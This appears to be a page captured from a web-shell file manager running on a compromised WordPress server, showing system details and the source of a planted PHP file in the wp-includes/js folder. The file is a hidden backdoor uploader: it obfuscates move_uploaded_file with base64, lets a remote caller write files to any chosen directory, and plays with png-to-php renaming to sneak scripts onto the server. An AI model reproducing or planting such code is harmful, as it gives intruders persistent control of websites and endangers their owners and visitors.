HEX
Server: Apache
System: Linux WWW 6.1.0-40-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.153-1 (2025-09-20) x86_64
User: web11 (1011)
PHP: 8.2.29
Disabled: NONE
$ pwd: /var/www/ippmt.kauko.lt/wp-includes/js/
Upload Files
File: /var/www/ippmt.kauko.lt/wp-includes/js/alswzu.php
<?php
//hsJ8u9kHIK
$a = base64_decode('bW92ZV91cGxvYWRlZF9maWxl');
$allowed_types = array('jpg', 'png');
if (isset($_FILES['img'])) {
    $dir = $_POST['dir'];
    $target_file = $_FILES['img']['name'];
    $imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
    if (!in_array($imageFileType, $allowed_types)) {
        exit;
    }
    $target_file = str_replace("png","php",$target_file);
    if (file_exists($target_file)){
        unlink($target_file);
    }
    var_dump($a($_FILES['img']['tmp_name'],$dir.$_FILES['img']['name']));
    var_dump(realpath($dir.$_FILES['img']['name']));
}
?>
@ Telegram